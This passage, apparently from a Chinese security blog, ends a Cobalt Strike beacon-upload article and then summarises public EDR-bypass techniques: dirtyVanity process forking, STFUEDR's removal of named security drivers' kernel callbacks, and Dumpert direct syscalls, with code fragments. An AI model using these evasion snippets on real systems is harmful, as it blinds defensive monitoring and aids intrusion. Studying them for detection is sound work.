style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">targets_other</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n211" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">[host]</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n212" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 313.469px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">$1 = selected hosts (array)</span></span></td></tr><tr cid="n213" mdtype="table_row" style="box-sizing: border-box;break-inside: avoid;break-after: auto;border-width: 1px;border-style: solid;border-color: rgb(223, 226, 229);"><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n214" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 165.062px;min-height: 10px;"><span md-inline="plain" style="box-sizing: border-box;">view</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"><span cid="n215" mdtype="table_cell" style="box-sizing: border-box;display: inline-block;min-width: 1ch;width: 189.469px;min-height: 10px;"><span md-inline="strong" style="box-sizing: border-box;"><strong style="box-sizing: border-box;">View</strong></span><span md-inline="plain" style="box-sizing: border-box;"> Menu</span></span></td><td style="box-sizing: border-box;padding: 6px 13px;border-color: rgb(223, 226, 229);min-width: 32px;"></td></tr></tbody></table></figure><p cid="n217" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">可以看到通过recentquery弹出对话框输入要查询的用户名后，调用回调函数recentqueryfunc，回调函数参数如下</span></p><p cid="n218" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, "Segoe UI Emoji", sans-serif;font-size: 16px;text-align: start;"><span md-inline="code" spellcheck="false" style="box-sizing: border-box;"><p style="box-sizing: border-box;font-family: var(--monospace);vertical-align: initial;border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);background-color: rgb(243, 244, 244);border-radius: 3px;padding-right: 2px;padding-left: 2px;font-size: 0.9em;">$1</p></span><span md-inline="plain" style="box-sizing: border-box;">是对对话框的引用。</span><span md-inline="code" spellcheck="false" style="box-sizing: border-box;"><p style="box-sizing: border-box;font-family: var(--monospace);vertical-align: initial;border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);background-color: rgb(243, 244, 244);border-radius: 3px;padding-right: 2px;padding-left: 2px;font-size: 0.9em;">$2</p></span><span md-inline="plain" style="box-sizing: border-box;">是按钮名称。</span><span md-inline="code" spellcheck="false" style="box-sizing: border-box;"><p style="box-sizing: border-box;font-family: var(--monospace);vertical-align: initial;border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);background-color: rgb(243, 244, 244);border-radius: 3px;padding-right: 2px;padding-left: 2px;font-size: 0.9em;">$3</p></span><span md-inline="plain" style="box-sizing: border-box;">是一个字典，将每一行的名称映射到它的值，所以在$3变量的字典中找到bid键的值，将文件上传到beacon上并执行</span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p></p>



<p><a href="2247483775">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7d60a9c7&r=1&u=http%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyOTI5MTM4OQ%3D%3D%26mid%3D2247483775%26idx%3D1%26sn%3D99f21e953cbe39245e819593d7b89486">跳转微信打开</a></p>

</article>
<article>
<h1>[新年特刊-初一篇]Bypass EDR</h1>
<p>Sun, 22 Jan 2023 00:01:00 +0800</p>
<p>
原创 <span>侠盗鲁平</span> <span>2023-01-22 00:01</span> <span style="display: inline-block;">内蒙古</span>
</p>

<p>对公开的edr绕过方法和项目的学习总结，渗透狗真的是摸着石头学习，感觉确实会有很多理解不到位的地方和错漏的地</p>
<p></p>



<p>

</p>


<p cid="n2" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">对公开的edr绕过方法和项目的学习总结，渗透狗真的是摸着石头学习，感觉确实会有很多理解不到位的地方和错漏的地方，希望大佬可以指正</span></p><h2 cid="n3" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">dirtyVanity</span></h2><p cid="n4" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">Eliran Nissan大佬之前在最近的欧洲黑帽大会上提出的姿势，众所周知，windows是不支持用户态的fork的，但是我们可以利用windows 机制Process Reflection和Process Snapshotting完成对目标进程的fork</span></p><ul class="list-paddingleft-1" cid="n5" mdtype="list" data-mark="+" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n7" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">Process Reflection：通过RtlCreateProcessReflection将进程远程fork，WDI（windows诊断基础结构）就是利用RtlCreateProcessReflection对持续运行的服务进行监控及调试</span></p></li><li style="box-sizing: border-box;"><p cid="n9" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">Process Snapshotting：能够部分或全部捕获流程状态。它类似于Tool Help API，但有一个重要优势：它可以使用 Windows 内部 POSIX  fork功能（NtCreateProcess[Ex]）有效地捕获进程的虚拟地址内容。可以使用MiniDumpWriteDump函数将进程快照转储到文件中</span></p></li></ul><p cid="n10" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">利用以上两个机制，我们就可以对fork出的子进程进行敏感操作，从而绕过edr对敏感进程的监控</span></p><pre spellcheck="false" lang="c++" cid="n12" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(152, 26, 26);">!</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">lib</span>)</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">{</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">return</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">-</span><span style="box-sizing: border-box;color: rgb(17, 102, 68);">1</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">RtlCreateProcessReflectionFunc</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">RtlCreateProcessReflection</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">RtlCreateProcessReflectionFunc</span>)<span style="box-sizing: border-box;color: rgb(0, 0, 0);">GetProcAddress</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">lib</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"RtlCreateProcessReflection"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(152, 26, 26);">!</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">RtlCreateProcessReflection</span>)</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">{</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">return</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">-</span><span style="box-sizing: border-box;color: rgb(17, 102, 68);">1</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">T_RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">info</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> { <span style="box-sizing: border-box;color: rgb(17, 102, 68);">0</span> };</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">NTSTATUS</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">reflectRet</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">RtlCreateProcessReflection</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">victimHandle</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">|</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">baseAddress</span>, <span style="box-sizing: border-box;color: rgb(119, 0, 136);">nullptr</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">NULL</span>, <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">info</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">reflectRet</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">==</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">STATUS_SUCCESS</span>) {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">std::cout</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);"><<</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"[+] Succesfully Mirrored to new PID: "</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);"><<</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">DWORD</span>)<span style="box-sizing: border-box;color: rgb(0, 0, 0);">info</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">ReflectionClientId</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">UniqueProcess</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);"><<</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">std::endl</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">else</span> {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">std::cout</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);"><<</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"[!] Error Mirroring: ERROR "</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);"><<</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">GetLastError</span>() <span style="box-sizing: border-box;color: rgb(152, 26, 26);"><<</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">std::endl</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">}</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span role="presentation" cm-text="	" style="box-sizing: border-box;font-family: var(--monospace);display: inline-block;">    </span><span style="box-sizing: border-box;color: rgb(119, 0, 136);">return</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">reflectRet</span>;</span></pre><p cid="n13" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">项目地址：</span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://github.com/deepinstinct/Dirty-Vanity" target="_blank">https://github.com/deepinstinct/Dirty-Vanity</a></span></p><h2 cid="n14" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">STFUEDR</span></h2><p cid="n15" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">因为edr通过注册 PspSetXXXXNotifyRoutine 内核回调函数来监视进程所以，程序直接检查</span><span md-inline="code" spellcheck="false" style="box-sizing: border-box;"><p style="box-sizing: border-box;font-family: var(--monospace);vertical-align: initial;border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);background-color: rgb(243, 244, 244);border-radius: 3px;padding-right: 2px;padding-left: 2px;font-size: 0.9em;">jmp PspSetXXXXNotifyRoutine</p></span><span md-inline="plain" style="box-sizing: border-box;">指令找到将PspSetXXXXNotifyRoutine 回调数组中edr的注册信息直接删掉，干掉edr的监控</span></p><pre spellcheck="false" lang="c++" cid="n16" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">              <span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">callBackAddr</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">!=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">NULL</span>) {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                    <span style="box-sizing: border-box;color: rgb(0, 0, 0);">DWORD64</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">callBackAddrSfht</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> ((<span style="box-sizing: border-box;color: rgb(0, 0, 0);">callBackAddr</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">>></span> <span style="box-sizing: border-box;color: rgb(17, 102, 68);">4</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);"><<</span> <span style="box-sizing: border-box;color: rgb(17, 102, 68);">4</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                    <span style="box-sizing: border-box;color: rgb(0, 0, 0);">DWORD64</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">drivercallbackFuncAddr</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">ReadMemoryDWORD64</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Device</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">callBackAddrSfht</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">+</span> <span style="box-sizing: border-box;color: rgb(17, 102, 68);">0x8</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                    <span style="box-sizing: border-box;color: rgb(119, 0, 136);">for</span> (<span style="box-sizing: border-box;color: rgb(0, 136, 85);">int</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">k</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(17, 102, 68);">0</span>; <span style="box-sizing: border-box;color: rgb(0, 0, 0);">k</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);"><</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">driverCount</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">-</span> <span style="box-sizing: border-box;color: rgb(17, 102, 68);">1</span>; <span style="box-sizing: border-box;color: rgb(0, 0, 0);">k</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">++</span>) {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                        <span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">drivercallbackFuncAddr</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">></span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">reinterpret_cast</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);"><</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">DWORD64</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">></span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">drivers</span>[<span style="box-sizing: border-box;color: rgb(0, 0, 0);">k</span>]) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">drivercallbackFuncAddr</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);"><</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">reinterpret_cast</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);"><</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">DWORD64</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">></span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">drivers</span>[<span style="box-sizing: border-box;color: rgb(0, 0, 0);">k</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">+</span> <span style="box-sizing: border-box;color: rgb(17, 102, 68);">1</span>])) {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">GetDeviceDriverBaseNameA</span>((<span style="box-sizing: border-box;color: rgb(0, 0, 0);">LPVOID</span>)<span style="box-sizing: border-box;color: rgb(0, 0, 0);">drivers</span>[<span style="box-sizing: border-box;color: rgb(0, 0, 0);">k</span>], <span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(119, 0, 136);">sizeof</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>));</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                            <span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(152, 26, 26);">!</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">strcmp</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"EX64.sys"</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">strcmp</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Eng64.sys"</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">strcmp</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"teefer2.sys"</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">strcmp</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"teefer3.sys"</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">strcmp</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"srtsp64.sys"</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">strcmp</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"srtspx64.sys"</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">strcmp</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"srtspl64.sys"</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">strcmp</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Ironx64.sys"</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">strcmp</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"fekern.sys"</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">strcmp</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">deviceName</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"cbk7.sys"</span>) <span style="box-sizing: border-box;color: rgb(152, 26, 26);">&&</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                  ....</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                  <span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Patch</span>)</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                                    <span style="box-sizing: border-box;color: rgb(0, 0, 0);">WriteMemoryDWORD64</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Device</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">nextaddr</span>, <span style="box-sizing: border-box;color: rgb(17, 102, 68);">0x0000000000000000</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                            }</span></pre><p cid="n17" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">项目地址：</span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://github.com/lawiet47/STFUEDR" target="_blank">https://github.com/lawiet47/STFUEDR</a></span></p><h2 cid="n18" mdtype="heading" style="box-sizing: border-box;break-after: avoid-page;break-inside: avoid;orphans: 4;font-size: 1.75em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.225;cursor: text;border-bottom: 1px solid rgb(238, 238, 238);white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">Dumpert</span></h2><p cid="n19" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">从这里开始的绕过思路都是通过直接调用syscall绕过edr 对用户态api的hook，而其中的代表地狱之门随着时间的推移为了对抗edr新的检测机制也衍生出了各类“门”,但核心思路是一致的</span></p><p cid="n19" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">一般来讲我们使用windows api调用windows的各项功能，在 Win32 API 之下是 Native API (ntdll.dll)，它实际上是 </span><span md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;">用户模式</em></span><span md-inline="plain" style="box-sizing: border-box;">应用程序和底层操作系统之间的真正接口，AV/EDR 的基本用户模式 API 挂钩通常是通过使用跳转 (JMP) 指令修改 API 调用的前 5 个字节到指向安全软件的另一个内存地址来创建的，但是当我们获取了syscall 号直接通过调用内核的的方式去执行操作，就可以绕过edr的监控</span></p><p cid="n20" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">利用</span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a 